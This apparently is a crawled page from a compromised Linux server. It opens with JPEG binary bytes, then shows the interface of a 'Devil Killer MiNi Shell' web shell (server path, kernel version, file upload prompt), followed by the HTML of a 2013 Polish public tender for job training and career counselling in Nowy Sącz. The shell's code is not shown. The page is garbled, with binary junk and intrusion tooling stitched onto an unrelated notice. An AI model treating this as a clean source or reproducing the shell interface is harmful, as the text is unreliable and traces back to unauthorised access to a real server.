JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130911/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130911/184149-N-2013.html

<p class="kh_header"><b>Nowy Sącz: Usługa w zakresie: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie treningu pracy oraz indywidualnego doradztwa zawodowego dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 184149 - 2013; data zamieszczenia: 11.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kilińskiego 72A, 33-300 Nowy Sącz, woj. małopolskie, tel. 0-18 4438251, faks 0-18 4442717.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie treningu pracy oraz indywidualnego doradztwa zawodowego dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Usługa w zakresie Projektu pn.: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie treningu pracy oraz indywidualnego doradztwa zawodowego dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
2. Przedmiotem zamówienia jest: Organizacja, obsługa techniczno-logistyczna i przeprowadzenie treningu pracy oraz indywidualnego doradztwa zawodowego dla uczestników projektu pn. W stronę samodzielności i niezależności realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
2.Zamówienie realizowane będzie w formie usług, z których każda stanowi odrębne zadanie: 
Liczba uczestników: 
zad. 1.  -  9 osób,
zad. 2.  - 7 osób.
Program  ma obejmować:
Zad. 1 - 8 godzin zajęć na grupę(1 godzina = 45 min.). 
Zad. 2 - 14 godzin zajęć indywidualnych (1 godzina = 60min.) - 2 godz. zajęć na 1 osobę 
Miejsce realizacji: miejscowość: Nowy Sącz siedziba PCPR lub inna sala na terenie miasta Nowy Sącza 
Termin realizacji: do 30.11.2013 r. w wybranych i uzgodnionych z Zamawiającym dniach tygodnia 
od poniedziałku do soboty.
Zadanie 1: Trening pracy dla wychowanków z placówek opiekuńczo - wychowawczych i rodzin zastępczych.
Liczba osób: 9. 
1.Program zajęć ma obejmować: 8 godzin lekcyjnych na grupę (1 godzina = 45 min.).
2.Liczba grup: 1; grupa 1.1: 9 osób.
3.Harmonogram zajęć 
2 spotkania po 4 h
Dni robocze (od poniedziałku do piątku)
15.30-17.00 (2h)
Przerwa kawowa 15 min.
17.15-18.45 (2h)
lub
Sobota (sala szkoleniowa poza PCPR)
9.00-10.30  (2h)
Przerwa kawowa
10.45-12.15	 (2h) 
4.Miejsce realizacji: Nowy Sącz - bezpłatnie udostępniona sala w siedzibie  PCPR w Nowym Sączu 
w dni robocze od poniedziałku do piątku w godzinach od 8.00 do 19.00. lub inna sala szkoleniowa 
na terenie miasta Nowy Sącz.
5.Termin realizacji: do 30 listopada 2013 r.
6.Zakres merytoryczny zadania powinien obejmować m.in.:
a)Rozpoznanie własnych umiejętności i zainteresowań zawodowych: badanie predyspozycji zawodowych wybór przyszłego zawodu, ścieżki kształcenia.;
b)Autoprezentacja, w tym: jak przygotować się do rozmowy kwalifikacyjnej, zasady prezentowania siebie podczas spotkań indywidualnych i grupowych, symulacje rozmów kwalifikacyjnych 
wraz z analizą; 
c)	Sporządzanie dokumentacji  aplikacyjnej, w tym: zasady sporządzania dokumentów niezbędnych przy zatrudnieniu - CV, życiorys zawodowy, list motywacyjny, redagowanie dokumentów aplikacyjnych, sporządzanie innych dokumentów przydatnych w poszukiwaniu pracy; 
d)	metody poszukiwania pracy, w tym: praca przez Internet - analiza ofert; praca na odległość; 
E-learning - nauczanie na odległość; zasoby informacji w Internecie - sprawdź co się dzieje w Twoim regionie; wskazania możliwości poszukiwania pracy.
7.	Metody szkoleniowe: 
prezentacje, mini-wykłady, dyskusje, ćwiczenia, symulacje, inscenizacje, odgrywanie ról.
WYMAGANIA OGÓLNE DO ZADANIA 1:
1.Wykonawca jest zobowiązany do zapewnienia serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka
lub równoważna ; gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe lub równoważna - bez ograniczeń), herbata (typu Lipton lub równoważna - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate lub równoważne - min. 2 szt.). 
2.Wykonawca jest zobowiązany do dostosowania na czas realizacji zadania sali szkoleniowej udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie 
w Nowym Sączu w zakresie wyposażenia (rzutnik multimedialny, laptop, ekran na statywie, papier 
do flipczartu, flipczart).
3.Wykonawca zobowiązany jest do prowadzenia dokumentacji zajęć (w tym również fotograficznej): dziennik zajęć; lista osób, które rozpoczęły trening; lista osób, które ukończyły trening; lista osób, które nie ukończyły treningu; rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć i uzyskanie umiejętności; kopie wydanych certyfikatów i zaświadczeń potwierdzających uczestnictwo w treningu; potwierdzenie transportu na zajęcia; potwierdzenie zwrotu kosztów dojazdu; lista obecności z potwierdzeniem korzystania z usługi cateringowej oraz odbiorem materiałów szkoleniowych; sprawozdanie merytoryczne z realizacji przedmiotu zamówienia i inne. Dokumenty powinny być opatrzone podpisem osoby prowadzącej oraz wykonawcy. Wzór ww listy Zamawiający udostępni Wykonawcy przed rozpoczęciem zajęć.
4.Każdy uczestnik treningu (zajęć) musi mieć zapewnione materiały szkoleniowe zawierające ologowanie oraz informacje o współfinansowaniu zgodne z obowiązującymi wytycznymi Ministerstwa Rozwoju Regionalnego w zakresie Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie WWW.efs.gov.pl,zakładka Zasady promocji), uzgodnione pomiędzy Zamawiającym a Wykonawcą przed rozpoczęciem treningu w tym zakresie tj. przybory piśmiennicze: komplet długopis i ołówek, co najmniej 60-kartkowy kartkowany notatnik w formacie A4, materiały dydaktyczne (np. kserokopie treści przekazywanych w trakcie zajęć, prezentacji multimedialnych). Materiały szkoleniowe należy rozdać uczestnikom trenigu w pierwszym dniu treningu i przechodzą one na własność uczestników 
po zakończeniu treningu, potwierdzenie ich odbioru Wykonawca jest zobowiązany przekazać Zamawiającemu wraz z dokumentacją ze szkolenia.
5.Wykonawca zapewni zwrot uczestnikom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższej tabeli określającej miejsce zamieszkania uczestników zajęć:
Grupa 1.1
L.p.	Miejsce zamieszkania	Liczba osób
1.	Gostwica 	2
2.	Stary Sącz	2
3.	Barcice	2
4.	Nowy Sącz	2
5.	Polna	1
Zadanie 2: Indywidualne doradztwo zawodowe dla osób niepełnosprawnych
1.Liczba osób: 7. 
Stopień niepełnosprawności: od lekkiego do znacznego; różne rodzaje niepełnosprawności, umożliwiające samodzielny udział w diagnozie. W przypadku 2 osób przewidywana opieka osób towarzyszących; 
2.Program zajęć ma obejmować: Jedno spotkanie obejmujące 2 godziny na osobę ( 1 godzina = 60 min.) 
3.Harmonogram zajęć uzgodniony indywidualnie z uczestnikami. 
4.Miejsce realizacji: Nowy Sącz - bezpłatnie udostępnione dwie sale w siedzibie  PCPR w Nowym Sączu w dni robocze od poniedziałku do piątku w godzinach od 8.00 do 19.00. lub inna sala szkoleniowa na terenie miasta Nowy Sącz.
5.Termin realizacji: do 30 listopada 2013 r.
6.Zakres merytoryczny zadania powinien obejmować m.in.:
a.ćwiczeniu umiejętności poszukiwania pracy oraz prezentowania siebie podczas spotkań indywidualnych i grupowych,
b.sporządzanie dokumentacji aplikacyjnej w tym: CV, życiorys zawodowy, list motywacyjny 
oraz  innych dokumentów przydatnych w poszukiwaniu pracy. 
7.Metody pracy: Indywidualna praca z uczestnikiem
WYMAGANIA OGÓLNE DO ZADANIA 2:
1.Wykonawca jest zobowiązany do zapewnienia serwisu kawowego z poczęstunkiem (drobne ciasteczka (typu Pieguski, paluszki, na jedno spotkanie), woda mineralna (0,5 l typu Piwniczanka lub równoważna gazowana i niegazowana - 2 szt. na osobę), kawa (typu Nescafe lub równoważna- bez ograniczeń), herbata (typu Lipton lub równoważna - bez ograniczeń), cukier (wg. potrzeb), śmietanka do kawy (typu Łaciate lub równoważne - min. 2 szt.). 
2.Wykonawca jest zobowiązany do dostosowania na czas realizacji zadania sali szkoleniowej udostępnionej przez Zamawiającego na terenie siedziby Powiatowego Centrum Pomocy Rodzinie 
w Nowym Sączu.
3.Wykonawca zobowiązany jest do prowadzenia dokumentacji (w tym również fotograficznej): dzienna lista obecności z wymiarem godzin; lista osób, które rozpoczęły doradztwo; lista osób, które ukończyły doradztwo; lista osób, które nie ukończyły doradztwa; rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie zajęć i uzyskanie umiejętności; kopie wydanych certyfikatów i zaświadczeń potwierdzających uczestnictwo w zajęciach; potwierdzenie transportu na zajęcia; potwierdzenie zwrotu kosztów dojazdu; lista obecności z potwierdzeniem korzystania z usługi cateringowej oraz odbiorem materiałów szkoleniowych; sprawozdanie merytoryczne z realizacji przedmiotu zamówienia i inne. Dokumenty powinny być opatrzone podpisem osoby prowadzącej 
oraz wykonawcy. Wzór w/w listy Zamawiający udostępni Wykonawcy przed rozpoczęciem doradztwa.
4.Każdy uczestnik zajęć musi mieć zapewnione materiały szkoleniowe zawierające ologowanie oraz informacje o współfinansowaniu zgodne z obowiązującymi wytycznymi Ministerstwa Rozwoju Regionalnego w zakresie Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie WWW.efs.gov.pl,zakładka Zasady promocji), uzgodnione pomiędzy Zamawiającym a Wykonawcą przed rozpoczęciem doradztwa, w tym zakresie tj. przybory piśmiennicze: komplet długopis i ołówek, 
co najmniej 60-kartkowy kartkowany notatnik w formacie A4, materiały dydaktyczne (np. kserokopie treści przekazywanych w trakcie zajęć). Materiały szkoleniowe należy rozdać uczestnikom w pierwszym dniu doradztwa i przechodzą one na własność uczestników po zakończeniu doradztwa, potwierdzenie ich odbioru Wykonawca jest zobowiązany przekazać Zamawiającemu wraz z dokumentacją z zajęć.
5.Wykonawca zapewni zwrot uczestnikom oraz opiekunom kosztów dojazdu z i do miejsca zamieszkania (Powiat Nowosądecki) na miejsce przeprowadzenie zajęć i z powrotem wg. poniższej tabeli określającej miejsce zamieszkania uczestników zajęć:
L.p.	Miejsce zamieszkania	Liczba osób
1.	Ptaszkowa	2 + 1 op.
2.	Łazy biegonickie - Stary Sacz	1
3.	Stary Sącz	1 + 1 op.
4.	Chełmiec - Biczyce Dolne	1
5.	Tęgoborze	1
6.	Chełmiec	1
WYMAGANIA OGÓLNE DO WSZYSTKICH ZADAŃ:
1.Wykonawcy jest zobowiązany do zapewnienia min. 1 doradcę zawodowego z wykształceniem wyższym posiadającego uprawnienia dla prowadzenia: poradnictwa zawodowego , doświadczenie zawodowe i uprawnienia w prowadzeniu zajęć z zakresu objętego niniejszym zamówieniem 
o ile przepisy prawa nakładają obowiązek ich posiadania.
2.Wykonawca zobowiązany jest dostarczyć harmonogram Zamawiającemu (do akceptacji 
i zatwierdzenia) w terminie 5 dni roboczych przed rozpoczęciem pierwszych zajęć.
3.Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących w zajęciach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
4.Wykonawca zobowiązany jest załączyć do oferty: wstępny programy merytoryczne 
z uwzględnieniem czasu trwania sporządzone odrębnie dla każdego zadania do uzgodnienia 
i akceptacji zamawiającego przed podpisaniem umowy. 
5.Wykonawca zobowiązany jest zapewnić uczestnikom zajęć oraz opiekunom transport lub zwrócić im koszt dojazdu równy cenie biletu  na trasie: miejsce zamieszkania - miejsce odbywania się zajęć 
i powrotem, na podstawie dostarczonego przez uczestnika biletu lub pisemnego oświadczenia uczestnika o wykorzystaniu samochodu osobowego na dojazd oraz powrót z zajęć.
6.Zajęcia mają się zakończyć badaniem ewaluacyjnym, przeprowadzonym w formie pisemnej, sprawdzającym nabycie, utrwalenie umiejętności społecznych oraz wzmocnienie kompetencji uczestników zajęć. Wykonawca zobowiązany jest przedłożyć dokumenty dot. ww. badania jest 
do akceptacji Zamawiającemu 5 dni przed rozpoczęciem zajęć. 
7.Wykonawca zobowiązany jest zapewnić bezpieczeństwo osób uczestniczących 
zajęciach, a także warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
8.Zamawiający przekaże Wykonawcy imienną listę uczestników z danymi niezbędnymi 
do prawidłowego wykonania zamówienia przed rozpoczęciem realizacji usługi. 
9.Wykonawca zobowiązuje się udzielać na żądanie Zamawiającego informacji dotyczących stanu realizacji przedmiotu zamówienia (np. liczby osób uczestniczących w zajęciach itp.).
10.Wykonawca zobowiązany jest do przekazania uczestnikom zajęć informacji na temat współfinansowania przedmiotu zamówienia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego i przekazać Zamawiającemu jedno pisemne oświadczenie w tej sprawie potwierdzającego wykonanie ww wymagania.
11.Wykonawca umożliwi pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji usługi oraz podda się ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzieli stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jego żądanie. 
12.Wykonawca przekaże Zamawiającemu oryginały z dokumentacji z zajęć w terminie 7 dni od zakończenia każdego z zadań. Dokumentacja zajęć powinna być oznakowana zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, zamieszczonymi na stronie internetowej: www.efs.gov.pl, zakładka - Zasady promocji.
13.Wykonawca zobowiązany jest do przeprowadzenia zajęć także w przypadku innej 
od wymienionej liczby osób w SIWZ. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo zmiany liczby uczestników zajęć. Zamawiający zapłaci Wykonawcy za faktyczną liczbę osób, które zakończą zajęcia na podstawie przekazanej dokumentacji zgodnie z pkt. 5. 
14.Wykonawca zobowiązany jest do sprawowania nadzoru nad frekwencją uczestników zajęć, a także bieżącego informowania osoby wyznaczonej po stronie Zamawiającego o każdej nieobecności osoby, która planowo powinna uczestniczyć w zajęciach.
15.Wykonawca wyznacza osobę do kontaktu (koordynator) - sprawującą nadzór nad realizacją przedmiotu zamówienia, odpowiedzialną za organizację i informowanie o planowanych zajęciach, ściśle współpracującą z osobą wyznaczoną po stronie Zamawiającego.
16.Wykonawca zobowiązany będzie do oznakowania miejsca zajęć oraz wszelkich dokumentów związanych z realizacją usługi zgodnie z Wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zamieszczonymi na stronie www.efs.gov.pl, zakładka Zasady promocji), tj. umieszczania informacji: Projekt W stronę samodzielności i niezależności jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz logotypu Programu Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny.
17.Zamawiający dopuszcza wykonanie zamówienia przy posłużeniu się innymi podmiotami - podwykonawcami. Jeżeli Wykonawca powierzy część zamówienia podwykonawcom, to Zamawiający na podstawie art. 36 ust. 4 ustawy żąda wskazania przez Wykonawcę w ofercie te części zamówienia, której wykonanie powierzy podwykonawcom. 
18.Zamawiający nie dopuszcza możliwości prowadzenia zajęć metodą e- learning. 
19.Wykonawca zobowiązany jest zapewnić dla każdego uczestnika zajęć ubezpieczenie NNW w trakcie jego trwania, a także w drodze na nie i z powrotem na kwotę minimalną 5 000 zł. Kserokopię dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu przed rozpoczęciem zajęć. 
20.Wykonawca wystawi rachunek,fakturę  po zakończeniu zadania..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych do wysokości 50 % wartości zamówienia przetargowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże wykonanie w przeciągu ostatnich 3 lat co najmniej , jednej usługi wskazanej dla zakresu - przedmiotu; ( łącznie lub odrębnie )dla każdego zadania nr I i II, przeprowadzonych w ramach realizacji projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (należyte wykonanie usług winno być potwierdzone dokumentami np. referencjami).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że osoba/osoby prowadzące posiadają wiedzę i doświadczenie w prowadzeniu zajęć z zakresu objętego niniejszym zamówieniem; tj. wykształcenie wyższe i uprawnienia do prowadzenia poradnictwa zawodowego na grupę. Posiadającego doświadczenie w prowadzeniu szkoleń lub warsztatów lub treningów z obszaru pomocy i integracji społecznej w tym w zakresie treningów kompetencji społecznych lub psychospołecznych lub życiowych lub podstawowych dla osób niepełnosprawnych; do prowadzenia warsztatów i ćwiczeń 
w przedmiotowym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów składanych przez wykonawców, o których mowa w pkt 11 SIWZ, reguluje m.in. rozporządzenie Prezesa Rady Ministrów z 19 luty 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z r.2013 poz.231).
2. Oświadczenia, o których mowa w pkt 11.2.1 SIWZ należy przedstawić w oryginale, pozostałe dokumenty wskazane w pkt 11 SIWZ mogą być przedstawione w formie oryginału  lub kopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem przez Wykonawcę (tj. osoby posiadające umocowanie prawne do reprezentowania firmy lub przez umocowanego Pełnomocnika). 
3. Dokument wielostronicowy przedłożony w formie kopii winien być potwierdzony za zgodność z oryginałem na każdej zapisanej (ponumerowanej) stronie.
4. W przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa, z którego wynika zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy. 
5. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego pełnomocnictwo należy dołączyć do oferty.
6. Pełnomocnictwo powinno być złożone w oryginale albo w kopii poświadczonej notarialnie.
7. Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane 
wraz z tłumaczeniem na język polski. 
